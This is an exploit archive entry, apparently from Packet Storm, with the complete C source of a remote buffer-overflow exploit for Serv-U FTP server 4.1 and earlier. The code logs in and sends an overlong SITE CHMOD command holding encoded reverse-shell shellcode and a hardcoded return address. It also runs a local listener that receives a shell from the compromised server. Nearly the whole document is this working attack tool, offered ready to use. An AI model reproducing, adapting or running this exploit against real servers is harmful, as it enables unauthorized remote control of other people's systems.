Remote exploit that makes use of a buffer overrun in the Serv-U FTP server versions 4.2 and below.
c4174e145fda328216ce0c52e5bf305b7a9f9a1cea90df103ee512f28f76a97d/*
date: 25 janv 2004
software: Serv-U 4.1.0.0 (prolly others)
vendor: RhinoSoft, http://www.serv-u.com/
credits: kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
greets: rosecurity team, int3liban
notes: should work on any NT, reverse bindshell, terminates the process
properly handle directories
author: mandragore, sploiting@mandragore.solidshells.com
cheap changelog:
27 jan 2004 improved banners handling (select()'s),
added listener,
default ip gathering (needs ifconfig & gawk)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#define fatal(x) { perror(x); exit(1); }
unsigned char sc[]={
// reverse bindshell, 204 bytes, uses import table
0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,
0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,
0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,
0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,
0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,
0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,
0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,
0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,
0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
};
char *user="anonymous";
char *pass="not@for.you";
char *path="/incoming";
int s, ret;
char *buff;
int verbose=0;
struct sockaddr_in saddr;
int lhost, lport=8888;
void usage(char *argv0) {
printf("usage: %s -d <ip_dest> [options]\n",argv0);
printf("options:\n");
printf(" -d target ip\n");
printf(" -p target port (default 21)\n");
printf(" -u username to log with (default %s)\n",user);
printf(" -s password to log with (default %s)\n",pass);
printf(" -w writable directory (default %s)\n",path);
printf(" -H listening host (default %s)\n", \
inet_ntoa(*(struct in_addr *)&lhost));
printf(" -P listening port on host (default %d)\n",lport);
printf(" -v verbose (set to 1 to enable)\n");
printf("\n");
exit(1);
}
void reads() {
fd_set fds;
struct timeval tv;
__next:
ret=recv(s,buff,4095,0);
memset(buff+ret,0,1);
if (verbose) printf("%s",buff);
FD_ZERO(&fds);
FD_SET(s,&fds);
tv.tv_sec = 1; tv.tv_usec = 0;
if (select(s+1, &fds, NULL, NULL, &tv)!=0)
goto __next;
}
int getip() {
char buff[17]="";
FILE *f;
f=popen("echo -n `/sbin/ifconfig|grep Bcast|" \
"gawk '{\\$0=gensub(/:/,\" \",1);print $3;exit;}'`","r");
fgets(buff,16,f);
pclose(f);
return inet_addr(buff);
}
void callback(int port) {
fd_set fds;
int s_len=sizeof(saddr);
int sn;
buff=(char *)malloc(4096);
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = 0;
saddr.sin_port = htons(port);
printf("[.] setting up listener on port %d..\n",port);
s=socket(2,1,6);
ret=bind(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
// we don't want to crash servu if not needed
perror("[-] shell.bind");
kill(getppid(),SIGUSR1);
exit(1);
}
listen(s,1);
sn=accept(s,(struct sockaddr *)&saddr,&s_len);
printf("[+] got connection from %s, entering shell..\n", \
inet_ntoa(*(struct in_addr *)&saddr.sin_addr.s_addr));
while(1) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sn,&fds);
if (select(sn+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select ");
if (FD_ISSET(0,&fds)) {
ret = read(1,buff,4096);
send(sn,buff,ret,0);
}
if (FD_ISSET(sn,&fds)) {
if ( (ret=recv(sn,buff,4096,0)) < 1 )
fatal("[-] shell.recv");
write(1,buff,ret);
}
}
}
void killchild() {
printf("[-] got signal from parent, exiting.\n");
exit(1);
}
void killmain() {
printf("[-] got signal from child, exiting.\n");
exit(1);
}
int main(int argc, char **argv) {
short port=21;
int target=0;
int i, pid;
int delta=423;
int callebx=0x10077A92; // libeay32.dll
char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
char chmod[]="SITE CHMOD 777 ";
printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n");
lhost=getip();
if (argc<2)
usage(argv[0]);
while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) {
switch (i) {
case 'd':
target=inet_addr(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'u':
user=optarg;
break;
case 's':
pass=optarg;
break;
case 'w':
path=optarg;
break;
case 'H':
lhost=inet_addr(optarg);
break;
case 'P':
lport=atoi(optarg);
break;
case 'v':
verbose=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if ((target==-1) || (lhost==-1) || (lhost==0))
usage(argv[0]);
printf("[.] if working you'll have a shell on %s:%d.\n", \
inet_ntoa(*(struct in_addr *)&lhost),lport);
printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);
pid=fork();
switch(pid) {
case 0:
signal(SIGUSR1,killchild);
callback(lport);
break;
default:
signal(SIGUSR1,killmain);
break;
}
lport=lport ^ 0x9696;
lport=(lport & 0xff) << 8 | lport >>8;
memcpy(sc+0x5a,&lport,2);
lhost=lhost ^ 0x96969696;
memcpy(sc+0x53,&lhost,4);
buff=(char *)malloc(4096);
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = target;
saddr.sin_port = htons(port);
s=socket(2,1,6);
ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
kill(pid,SIGUSR1); sleep(1);
fatal("[-] connect()");
}
reads();
sprintf(buff,"USER %s\r\n",user);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);
reads();
sprintf(buff,"PASS %s\r\n",pass);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);
reads();
if (strstr(buff,"230")==0) {
printf("[-] can't login\n");
exit(1);
} else
printf("[+] logged in.\n");
sprintf(buff,"CWD %s\r\n",path);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);
reads();
// verify directory
sprintf(buff,"PWD\r\n",path);
send(s,buff,strlen(buff),0);
ret=recv(s,buff,1024,0);
memset(buff+ret,0,1);
i=strstr(buff+5,"\x22")-buff-5;
if (i!=1) i++; // trailing /
printf("[+] sending exploit..\n");
bzero(buff,4096);
memset(buff,0x90,600);
strcat(buff,"\r\n");
delta-=i; // strlen(path);
memcpy(buff,&chmod,strlen(chmod));
memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
memcpy(buff+delta-9,&jmpback,5+4);
memcpy(buff+delta,&callebx,4);
send(s,buff,602,0);
ret=recv(s,buff,1024,0);
if ((ret==0) || (ret==-1)) {
kill(pid,SIGUSR1); sleep(1);
sleep(1);
fatal("[+] done");
}
printf("[-] remote servu isn't vulnerable.\n");
memset(buff+ret,0,1);
printf("%s",buff);
close(s);
exit(0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed